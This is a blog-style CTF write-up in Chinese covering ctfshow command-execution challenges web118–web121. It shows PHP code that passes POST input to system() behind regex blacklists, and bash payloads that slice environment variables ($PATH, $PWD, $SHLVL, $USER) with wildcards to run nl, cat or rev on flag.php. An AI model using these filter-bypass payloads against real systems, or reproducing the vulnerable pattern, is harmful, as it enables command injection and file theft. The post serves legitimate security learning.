Natro92's Site
Tailwind CSS Navbar component

web118-web122+web124命令执行篇(四)

2023/04/13 22:32:45

参考链接:

https://blog.csdn.net/weixin_46081055/article/details/121721209

web118

题目里面提示了:flag in flag.php
随便提交一点东西,看到源代码中:
image.png
post上传然后system执行,但是没有回显。
但是输入会出现evil input,因此想到可能是有过滤。
fuzz一下:
发现有的字符被过滤掉了:
image.png
剩余的字符有A-Z;:{}?#$_,@~
看了wp学了一个新姿势:以下是在本地测试的。
image.png
image.png
我们到web测试一下:
web上的用户名末尾为l,path末尾为n,因此我们可以尝试组合:

${PATH:~A}${PWD:~A}$IFS????.???

组合成为nl查找文件。
image.png
当然也有使用别的字段的方法:

SHLVL是记录多个 Bash 进程实例嵌套深度的累加器,进程第一次打开shell时${SHLVL}=1,然后在此shell中再打开一个shell时${SHLVL}=2。
${PWD:${#}:${SHLVL}}就输出/

${#}是0,${SHLVL}为1
${#PWD}是回显字符数,${PWD} 是/root,${#PWD}是5
#${RANDOM}是随机数,${#RANDOM}一般是5,也可能是4
${PATH:${#HOME}:${#SHLVL}}${PATH:${#RANDOM}:${#SHLVL}} ?${PATH:${#RANDOM}:${#SHLVL}}??.???

#其他师傅
${PATH:~A}${PATH:${#TERM}:${SHLVL:~A}} ????.???

web119

这道题把${PATH}给禁用了。因此我们需要想出其他解法。
payload:

${PWD:${#}:${#SHLVL}}???${PWD:${#}:${#SHLVL}}?${USER:~${PHP_VERSION:~A}:${PHP_VERSION:~A}} ????.???
# pwd=/var/www/html
# USER=www-data
# payload即为 /???/?at ????.???
为了构造/bin/cat

image.png
也可以只要a进行构造

${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???
/???/?a? ????.???

这两个查看的时候都需要打开f12查看。
image.png

web120

fuzz一下看看剩余什么可用字符:

<?php
  //fuzz一下看看剩余什么字符
  for($i = 33; $i <= 126; $i++){
  		if(!preg_match("/\x09|\x0a|[a-z]|[0-9]|PATH|BASH|HOME|\/|\(|\)|\[|\]|\\\\|\+|\-|\!|\=|\^|\*|\x26|\%|\<|\>|\'|\"|\`|\||\,/", chr($i))){
  				echo chr($i);
  		}
  }
?>

image.png
剩余:#$.:;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ_{}~
通过观察,应该是还是用上一道题类似的方法。但是这次过滤了PATH|BASH|HOME三个字段。
所以构建payload:

${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???
/???/?a? ????.???

image.png

web121

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){
    $code=$_POST['code'];
    if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|FLAG|PATH|BASH|HOME|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME|\/|\(|\)|\[|\]|\\\\|\+|\-|_|~|\!|\=|\^|\*|\x26|\%|\<|\>|\'|\"|\`|\||\,/', $code)){    
        if(strlen($code)>65){
            echo '<div align="center">'.'you are so long , I dont like '.'</div>';
        }
        else{
        echo '<div align="center">'.system($code).'</div>';
        }
    }
    else{
     echo '<div align="center">evil input</div>';
    }
}

?>

比上一题过滤更加严密,把FLAG|PATH|BASH|HOME|HISTIGNORE|HISTFILESIZE|HISTFILE|HISTCMD|USER|TERM|HOSTNAME|HOSTTYPE|MACHTYPE|PPID|SHLVL|FUNCNAME都过滤掉了。
好像把${PWD}留下了。

code=${PWD::${#?}}???${PWD::${#?}}${PWD:${#IFS}:${#?}}?? ????.???

/???/r?? ????.???
/bin/rev

`${?}=0,$